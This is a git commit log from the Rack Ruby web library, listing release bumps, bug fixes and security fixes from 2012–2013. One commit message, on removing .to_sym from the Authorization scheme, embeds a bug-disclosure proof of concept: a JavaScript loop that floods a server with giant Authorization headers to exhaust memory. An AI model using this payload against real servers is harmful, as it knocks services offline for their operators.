Santiago Pastorino [Mon, 15 Jul 2013 03:09:27 +0000 (20:09 -0700)]
Merge pull request #585 from MSch/patch-1
Fix bug in sendfile.rb
James Tucker [Fri, 8 Feb 2013 03:01:22 +0000 (19:01 -0800)]
Bump version number
James Tucker [Fri, 8 Feb 2013 02:57:06 +0000 (18:57 -0800)]
Add release notes for todays releases
James Tucker [Thu, 7 Feb 2013 00:25:22 +0000 (16:25 -0800)]
Prevent symlink path traversals
* Closes CVE-2013-0262
Tim Moore [Wed, 30 Jan 2013 02:45:32 +0000 (13:45 +1100)]
Stop overwriting existing pidfiles.
A race condition can arise when two servers are started simultaneously. Both
instances may complete the check for an existing pidfile before either one
writes it.
Now the pidfile is opened with ::File::EXCL, which raises an error if the file
already exists. This error is handled by retrying the check and the write.
James Tucker [Thu, 7 Feb 2013 22:47:10 +0000 (14:47 -0800)]
Use secure_compare for hmac comparison
* Closes CVE-2013-0263
James Tucker [Wed, 6 Feb 2013 23:31:53 +0000 (15:31 -0800)]
Add secure_compare to Rack::Utils
Conflicts:
test/spec_utils.rb
James Tucker [Thu, 7 Feb 2013 02:01:06 +0000 (18:01 -0800)]
Ensure binary modes are used in tests, for Windows
James Tucker [Thu, 7 Feb 2013 01:40:34 +0000 (17:40 -0800)]
Fix a bug where host matching occurs out of order
* Closes #504
James Tucker [Wed, 6 Feb 2013 22:13:10 +0000 (14:13 -0800)]
Add JSON cookie coder. To be default after 1.6+
Jordi Massaguer Pla [Wed, 6 Feb 2013 12:41:16 +0000 (13:41 +0100)]
add license information to gemspec
this way it can be used with rubygems.org API
Oscar Del Ben [Sun, 3 Feb 2013 05:28:50 +0000 (21:28 -0800)]
Fix reference link
Oscar Del Ben [Sun, 3 Feb 2013 03:50:01 +0000 (19:50 -0800)]
Document Rack::Deflater
James Tucker [Sat, 2 Feb 2013 16:06:26 +0000 (08:06 -0800)]
Request#trusted_proxy? no longer accepts lines
* Closes #508
* Adds some limited coverage. More issues highlighted - incomplete local ips.
Santiago Pastorino [Tue, 29 Jan 2013 14:01:44 +0000 (12:01 -0200)]
Add find and set methods to Session object
James Tucker [Mon, 28 Jan 2013 22:49:43 +0000 (14:49 -0800)]
Fix ChangeLog generation on 1.9.3+
James Tucker [Mon, 28 Jan 2013 22:42:41 +0000 (14:42 -0800)]
Bump version and add release notes to README
James Tucker [Mon, 28 Jan 2013 21:44:57 +0000 (13:44 -0800)]
Merge pull request #500 from aocole/patch-1
Changing incorrect documentation
James Tucker [Mon, 28 Jan 2013 21:37:11 +0000 (13:37 -0800)]
Remove specific version code from Lint
* Too easy to miss during updates
* Required format unchanged
* Closes #501
James Tucker [Mon, 28 Jan 2013 21:30:52 +0000 (13:30 -0800)]
Reimplement keys and values on SessionHash
* Basic additional APIs to simplify requirements for Rails and Devise
Andrew Cole [Fri, 25 Jan 2013 05:02:23 +0000 (21:02 -0800)]
Changing incorrect documentation
The original comment on set_session said to return true or false
depending on whether the session was saved or not. In reality, this
method MUST return the session id in order for #commit_session to set
the cookie data properly.
James Tucker [Tue, 22 Jan 2013 16:04:18 +0000 (08:04 -0800)]
Merge branch 'lint-headerhash' of git://bogomips.org/rack
* 'lint-headerhash' of git://bogomips.org/rack:
lint: avoid TypeError on non-Hash-like response headers
Konstantin Haase [Tue, 22 Jan 2013 14:23:11 +0000 (06:23 -0800)]
Merge pull request #499 from barttenbrinke/master
Added specific test when X-Forwarded-For is 'unknown'
Bart ten Brinke [Tue, 22 Jan 2013 14:14:42 +0000 (15:14 +0100)]
Added spec for new Squid behaviour.
Also see http://www.squid-cache.org/Doc/config/forwarded_for/
Eric Wong [Tue, 22 Jan 2013 11:29:59 +0000 (11:29 +0000)]
lint: avoid TypeError on non-Hash-like response headers
According to SPEC (and check_headers), Response headers need only
respond to #each. Thus, check_hijack_response should rely on
Rack::Utils::HeaderHash if it wishes to access the headers in a
hash-like fashion.
James Tucker [Tue, 22 Jan 2013 07:36:04 +0000 (23:36 -0800)]
Update gemspec version, Rack 1.5.0
James Tucker [Tue, 22 Jan 2013 07:35:34 +0000 (23:35 -0800)]
Update README for 1.5.0 release
James Tucker [Tue, 22 Jan 2013 04:12:57 +0000 (20:12 -0800)]
Switch to RFC 2822 expires
James Tucker [Mon, 21 Jan 2013 22:01:58 +0000 (14:01 -0800)]
Fix a long standing misnomer for date formats
References #414
James Tucker [Mon, 21 Jan 2013 21:30:16 +0000 (13:30 -0800)]
Use Dir.tmpdir instead of hardcoded /tmp
Closes #492
James Tucker [Mon, 21 Jan 2013 21:24:24 +0000 (13:24 -0800)]
Don't modify the middleware hash in Rack::Server
* Closes #498
James Tucker [Mon, 21 Jan 2013 21:17:23 +0000 (13:17 -0800)]
Merge pull request #496 from homakov/patch-3
Remove never called string
Egor Homakov [Mon, 14 Jan 2013 15:48:10 +0000 (22:48 +0700)]
Remove never called string
Previous check `p.empty?` makes sure that p contains at least 1 symbol.
After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
James Tucker [Sun, 13 Jan 2013 22:10:08 +0000 (14:10 -0800)]
Update to 1.5.0.beta.2
James Tucker [Sun, 13 Jan 2013 22:09:25 +0000 (14:09 -0800)]
Update README security notes
James Tucker [Sun, 13 Jan 2013 21:55:50 +0000 (13:55 -0800)]
Update README for release. Add security section.
James Tucker [Sun, 13 Jan 2013 21:46:27 +0000 (13:46 -0800)]
Rack::Auth::AbstractRequest#scheme returns strings
* This is a breaking API change, but doesn't appear to be used in public
James Tucker [Sun, 13 Jan 2013 21:37:30 +0000 (13:37 -0800)]
Squash test warnings
James Tucker [Sun, 13 Jan 2013 21:33:30 +0000 (13:33 -0800)]
Turn warnings back on for basic test runs
James Tucker [Sun, 13 Jan 2013 21:33:08 +0000 (13:33 -0800)]
Squash warnings in spec_auth
James Tucker [Sun, 13 Jan 2013 21:10:20 +0000 (13:10 -0800)]
Reimplement auth scheme fix
* Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
* Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
* Checked Rails - they don't use our authorization code
* Checked Warden - uses rails
* Checked Omniauth - uses rails
* Checked doorkeeper - users rails
* Checked rack-authentication - does it's own thing
* Checked warden-oauth - doesn't do headers
* Checked devise - uses rails
* Checked oauth2-rack - header creation only
* Checked rack-oauth2-server - does it's own thing
* Probably missed a bunch, but that'll have to do
James Tucker [Sun, 13 Jan 2013 20:31:12 +0000 (12:31 -0800)]
Revert "Merge pull request #494 from homakov/patch-2"
This reverts commit
9b76e4fb58b5870ff48ba9704432787bc2e76cfb, reversing
changes made to
bf32f4bbfc5401dde48341cd5e664e2f7837d151.
Konstantin Haase [Sun, 13 Jan 2013 15:29:24 +0000 (07:29 -0800)]
Merge pull request #494 from homakov/patch-2
Remove .to_sym in Authorization scheme
Egor Homakov [Sun, 13 Jan 2013 15:15:25 +0000 (22:15 +0700)]
Remove .to_sym in Authorization scheme
Hello, `.to_sym` should never be applied on user input. Thus I recommend you to change `scheme` method:
```
def scheme
@scheme ||= parts.first.downcase.to_sym
end
```
While we can't send enourmous emount of `Authorization` headers we can make it as long as it's possible.
This is PoC. App:
```
cat config.ru
require 'rack'
run lambda{|e|
auth = Rack::Auth::Basic::Request.new(e)
puts auth.basic? if auth.provided?
puts Symbol.all_symbols.size
[200, {'Content-Type'=>'text/html'},['IM FINE']]
}
```
Simple Javascript to DoS it:
```
var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
var total_sent = 0
for(var num in base){
var x = new XMLHttpRequest;
x.open('GET','/');
str = '';
for(i=0;i<
2000000;i++){
str+='Ё'+base[num]+i;
}
x.setRequestHeader('Authorization',str+' lol')
x.send();
console.log('Total sent: ',total_sent+=str.length);
}
```
When we run JS every request carries
18888890 letters in a symbol. This 'data' will never be garbarge collectored.
Should it be fixed?
James Tucker [Fri, 11 Jan 2013 22:57:12 +0000 (14:57 -0800)]
Merge branch 'hijack'
* hijack:
Hijack SPEC changes after review discussion
Add straw man for the after-headers hijack
Straw man for rack.hijack*, connection hijacking!
James Tucker [Fri, 11 Jan 2013 22:56:52 +0000 (14:56 -0800)]
Hijack SPEC changes after review discussion
James Tucker [Fri, 11 Jan 2013 22:26:04 +0000 (14:26 -0800)]
Add q-value helpers for Accept headers, etc.
* Supersedes and closes #443
James Tucker [Fri, 11 Jan 2013 18:39:17 +0000 (10:39 -0800)]
Introduce Rack::Mime.match?, references #443
James Tucker [Fri, 11 Jan 2013 18:22:02 +0000 (10:22 -0800)]
Minor code review comments closing #451
* Adds documentation
* find is preferred over detect
* Superseded body objects should be closed
James Tucker [Fri, 11 Jan 2013 18:14:40 +0000 (10:14 -0800)]
Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"
This reverts commit
3b24fa958ba43baad66c7e866990e052497c89f8.
James Tucker [Fri, 11 Jan 2013 18:13:58 +0000 (10:13 -0800)]
Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/rack into sendfile
* 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
Set TMPDIR to fix Dir.mktmpdir under jRuby
Additional Ruby 1.8 compaitiblity
Make spec_sendfile work with Ruby < 1.9
Initialize Rack::Sendfile with accel mappings
James Tucker [Fri, 11 Jan 2013 18:08:07 +0000 (10:08 -0800)]
Enable unix sockets with paths as trusted proxies
* Supersedes and closes #488
James Tucker [Fri, 11 Jan 2013 17:02:17 +0000 (09:02 -0800)]
Merge pull request #491 from spastorino/allow_build_different_session_object
Allow subclasses build a different Session Object
Santiago Pastorino [Fri, 11 Jan 2013 03:57:54 +0000 (01:57 -0200)]
Allow subclasses build a different Session Object
James Tucker [Fri, 11 Jan 2013 02:51:51 +0000 (18:51 -0800)]
Merge pull request #490 from slivu/master
Added Reel Web Server and Espresso Framework to supported software list
James Tucker [Fri, 11 Jan 2013 02:51:35 +0000 (18:51 -0800)]
Merge pull request #489 from spastorino/abstract_id_tiny_patches
Abstract id tiny patches
slivu [Thu, 10 Jan 2013 14:19:58 +0000 (16:19 +0200)]
Update README.rdoc
Santiago Pastorino [Thu, 10 Jan 2013 14:03:34 +0000 (12:03 -0200)]
Fix current_session_id docs, id it's retrieved from SessionHash now
Santiago Pastorino [Thu, 10 Jan 2013 02:53:40 +0000 (00:53 -0200)]
Implement the ID API correctly
Santiago Pastorino [Thu, 10 Jan 2013 02:44:02 +0000 (00:44 -0200)]
Session is already loaded at this point
Santiago Pastorino [Wed, 9 Jan 2013 02:59:10 +0000 (00:59 -0200)]
Rename by to store to match better the purpose of that object
James Tucker [Mon, 7 Jan 2013 22:01:01 +0000 (14:01 -0800)]
Merge pull request #487 from carlosantoniodasilva/remove-warnings
Remove warnings: 'not used variable' and 'shadowing outer variable'
Carlos Antonio da Silva [Mon, 7 Jan 2013 21:12:42 +0000 (19:12 -0200)]
Remove warnings: 'not used variable' and 'shadowing outer variable'
James Tucker [Mon, 7 Jan 2013 18:46:43 +0000 (10:46 -0800)]
Add release announcements to README
Eric Wong [Wed, 22 Aug 2012 22:48:23 +0000 (22:48 +0000)]
multipart/parser: avoid unbounded #gets method
Malicious clients may send excessively long lines
to trigger out-of-memory errors in a Rack web server.
James Tucker [Mon, 7 Jan 2013 03:35:31 +0000 (19:35 -0800)]
Merge pull request #484 from oscardelben/update_examples
Update Lobster example
Oscar Del Ben [Mon, 7 Jan 2013 03:20:29 +0000 (19:20 -0800)]
Update Lobster example
James Tucker [Mon, 7 Jan 2013 03:02:14 +0000 (19:02 -0800)]
Merge pull request #483 from oscardelben/update_readme
Remove reference to dead link
Oscar Del Ben [Mon, 7 Jan 2013 02:53:52 +0000 (18:53 -0800)]
Remove reference to dead link
James Tucker [Sun, 6 Jan 2013 23:49:41 +0000 (15:49 -0800)]
Update release date from rack-1.3 branch
James Tucker [Sun, 6 Jan 2013 23:41:50 +0000 (15:41 -0800)]
Add missing release section from 1.1 branch
James Tucker [Sun, 6 Jan 2013 23:03:47 +0000 (15:03 -0800)]
Add todays releases to the README
James Tucker [Sun, 6 Jan 2013 22:20:36 +0000 (14:20 -0800)]
Merge pull request #482 from oscardelben/fix_webrick_port
Add default port to webrick
Oscar Del Ben [Sat, 5 Jan 2013 22:53:19 +0000 (14:53 -0800)]
Add default port to webrick
James Tucker [Sat, 5 Jan 2013 02:28:15 +0000 (21:28 -0500)]
Add straw man for the after-headers hijack
James Tucker [Fri, 4 Jan 2013 23:33:07 +0000 (18:33 -0500)]
Straw man for rack.hijack*, connection hijacking!
James Tucker [Fri, 4 Jan 2013 17:17:36 +0000 (09:17 -0800)]
Merge pull request #480 from udzura/master
Add a rackup option for a one-liner rack app server
James Tucker [Fri, 4 Jan 2013 16:46:46 +0000 (11:46 -0500)]
master is now Rack 1.5, SPEC 1.2.
James Tucker [Sun, 13 May 2012 22:02:17 +0000 (15:02 -0700)]
Fix parsing performance for unquoted filenames
Special thanks to Paul Rogers & Eric Wong
Conflicts:
test/spec_multipart.rb
Uchio KONDO [Thu, 3 Jan 2013 03:00:27 +0000 (12:00 +0900)]
Add a rackup option for one-liner rack app server
Uchio KONDO [Thu, 3 Jan 2013 02:45:47 +0000 (11:45 +0900)]
Extract Builder.new_from_string from Builder.parse_file
James Tucker [Sun, 30 Dec 2012 05:31:14 +0000 (00:31 -0500)]
Cleanup Lint Content-Type section after
3623d04
James Tucker [Sun, 30 Dec 2012 05:17:56 +0000 (00:17 -0500)]
Revert "Merge pull request #259 from bartuer/master"
This reverts commit
ec5634c6151412a722df7c3305fd3b6291a66ec5, reversing
changes made to
c23edf4f7d43ed9fba3fde1cbcf7ebf286730829.
James Tucker [Sun, 30 Dec 2012 05:15:12 +0000 (21:15 -0800)]
Merge pull request #259 from bartuer/master
add content type check to deflater
James Tucker [Sun, 30 Dec 2012 04:36:57 +0000 (20:36 -0800)]
Merge pull request #367 from rack/mime_type
Mime type corrections
James Tucker [Sat, 17 Mar 2012 19:50:59 +0000 (12:50 -0700)]
Correct some of the mime type issues. References #316 and #366.
HTTP 1.0 and 1.1 do not have MUST for Content-Type requirements, they have "should" (not SHOULD). They also have text describing how clients should handle this header being missing.
Sokolov Yura [Fri, 9 Nov 2012 09:58:56 +0000 (13:58 +0400)]
Fix parsing multiple ranges
Fix parsing miltiple ranges in HTTP_RANGE header according to w3 rfc2616 (according to last example in sec14.35.1 http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35.1 ) (according to BNF rules in http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.1 )
James Tucker [Sat, 29 Dec 2012 20:47:59 +0000 (15:47 -0500)]
.woff now has an official mime type!
* Closes #405
James Tucker [Sat, 29 Dec 2012 20:44:56 +0000 (12:44 -0800)]
Merge pull request #458 from hexfet/master
Allow EOFError exception to be passed through
James Tucker [Sat, 29 Dec 2012 20:28:25 +0000 (15:28 -0500)]
Do not fail on cookies that are not URI escaped
* Closes #360
James Tucker [Sat, 29 Dec 2012 18:04:46 +0000 (13:04 -0500)]
Add a note in KNOWN-ISSUES regarding ECMA escape
James Tucker [Sat, 29 Dec 2012 19:59:43 +0000 (11:59 -0800)]
Merge pull request #476 from spastorino/fix_2_0_build
Fix Ruby 2.0 build
Santiago Pastorino [Sat, 29 Dec 2012 19:36:08 +0000 (17:36 -0200)]
Fix Ruby 2.0 build
Konstantin Haase [Sat, 29 Dec 2012 19:05:04 +0000 (20:05 +0100)]
add ruby 2.0 to travis matrix
Konstantin Haase [Sat, 29 Dec 2012 18:51:55 +0000 (10:51 -0800)]
Merge pull request #475 from spastorino/remove_2_0_warns
Use to_enum instead of Enumerator.new to remove Ruby 2.0 warnings
Santiago Pastorino [Sat, 29 Dec 2012 18:49:27 +0000 (16:49 -0200)]
Use to_enum instead of Enumerator.new to remove Ruby 2.0 warnings
This commit avoid warn message
Enumerator.new without a block is deprecated; use Object#to_enum
James Tucker [Sat, 29 Dec 2012 16:37:22 +0000 (08:37 -0800)]
Merge pull request #474 from yeban/handlers_puma
Add puma as a potential default alongside thin (replace #455).
Anurag Priyam [Fri, 28 Dec 2012 22:50:55 +0000 (22:50 +0000)]
Add puma as a potential default alongside thin (close #455).
Signed-off-by: Anurag Priyam <anurag08priyam@gmail.com>
Anurag Priyam [Fri, 28 Dec 2012 22:46:41 +0000 (22:46 +0000)]
Introduce Rack::Handler.pick ...
... to select first available Rack handler given a list of server names.
This functionality is ripped off Sinatra::Base.detect_rack_handler with very
minor semantic and cosmetic changes.
Signed-off-by: Anurag Priyam <anurag08priyam@gmail.com>
James Tucker [Sat, 29 Dec 2012 01:03:18 +0000 (17:03 -0800)]
Merge pull request #453 from unbit/master
add uWSGI to the list of servers supporting Rack
projects / rack / log